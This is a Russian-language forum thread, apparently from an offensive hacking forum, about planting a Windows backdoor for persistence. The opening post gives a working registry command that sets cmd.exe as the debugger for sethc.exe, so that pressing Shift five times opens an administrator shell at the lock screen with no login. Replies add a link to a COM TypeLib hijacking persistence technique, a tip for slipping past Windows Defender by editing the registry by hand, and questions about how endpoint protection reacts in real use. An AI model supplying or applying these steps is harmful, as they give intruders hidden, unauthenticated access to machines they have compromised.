Легитимный LPE backdoor в Windows

[weasley7]

Требования: права локального администратора.

Пять раз жмем Shift и открывается командная строка с правами админа. Можно запустить и с экрана блокировки, без аутентификации в системе. Техника Event Triggered Execution далеко не новая, но по-моему эта реализация лаконичная.

Для этого редактируем ветку реестра:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\system32\cmd.exe" /f

 

[downshifter]

добавлю новый способ

Hijack the TypeLib. New COM persistence technique​

Hijack the TypeLib. New COM persistence technique

A new way of persistence on Windows systems via COM. Down with COM Hijacking, the future is TypeLib Hijacking! Read more here :)

cicada-8.medium.com

 

[terrible44]

Если командой ставить - виндеф детектит как

Behavior:Win32/AccessibilityEscalation.F

Если вручную ставить через regedit - все ок

 

[danilarushik]

добавлю новый способ

Hijack the TypeLib. New COM persistence technique​

Hijack the TypeLib. New COM persistence technique

A new way of persistence on Windows systems via COM. Down with COM Hijacking, the future is TypeLib Hijacking! Read more here :)

cicada-8.medium.com

кто уже тестировал в бою этот новый способ? как ведут себя ЕДР ?

 

[weaver]

/threads/52595/

 

[Marti71]

Имейте ввиду, что есть уже чекеры на эту тему и ваш доступ могут увести